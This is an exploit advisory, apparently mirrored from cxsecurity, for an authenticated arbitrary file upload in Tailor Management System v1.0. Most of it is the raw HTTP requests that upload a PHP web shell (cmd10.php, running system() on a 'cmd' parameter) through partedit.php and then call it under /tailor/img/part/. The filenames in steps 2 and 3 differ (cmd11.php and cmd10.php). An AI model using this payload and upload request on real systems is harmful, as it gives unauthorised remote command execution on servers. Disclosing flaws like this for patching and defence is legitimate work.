Tailor Management System - Arbitrary File Upload (Authenticated)
2020-10-11 00:02:43 Author: cxsecurity.com(查看原文) 阅读量:243 收藏

Tailor Management System - Arbitrary File Upload (Authenticated)

# Exploit Title: Tailor Management System - Arbitrary File Upload (Authenticated) # Google Dork: N/A # Date: 2020-09-08 # Exploit Author: mosaaed # Vendor Homepage: https://www.sourcecodester.com/php/14378/tailor-management-system-php-mysql.html # Software Link: https://www.sourcecodester.com/download-code?nid=14378&title=Tailor+Management+System+in+PHP+MySQL # Version: v1.0 # Tested on: Kali linux # CVE: N/A Step 1 - Request POST /tailor/partedit.php?id=6 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------374227061277520034476021901 Content-Length: 943 DNT: 1 Connection: close Referer: http://localhost/tailor/partedit.php?id=6 Cookie: PHPSESSID=vrjbboto2c5v4tvhpssoiouvh0 Upgrade-Insecure-Requests: 1 -----------------------------374227061277520034476021901 Content-Disposition: form-data; name="type" 1 -----------------------------374227061277520034476021901 Content-Disposition: form-data; name="title" HIPS -----------------------------374227061277520034476021901 Content-Disposition: form-data; name="detail" Take out all of the stuff in the front and back pockets your trouser. The hip measurement should be taken around the hips at the widest point. Stand up in a relaxed posture, and keep the tape parallel. Do not tighten the tape measure. Make sure you can move the tape easily. -----------------------------374227061277520034476021901 Content-Disposition: form-data; name="bgimg"; filename="cmd10.php" Content-Type: application/x-php <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?> -----------------------------374227061277520034476021901-- Step 2 - Response GET /tailor/img/part/cmd11.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: image/webp,*/* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Referer: http://localhost/tailor/partedit.php?id=6 Cookie: PHPSESSID=vrjbboto2c5v4tvhpssoiouvh0 Step 3 - Read file uploaded http://localhost/tailor/img/part/cmd10.php



 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}


文章来源: https://cxsecurity.com/issue/WLB-2020100063
如有侵权请联系:admin#unsafe.sh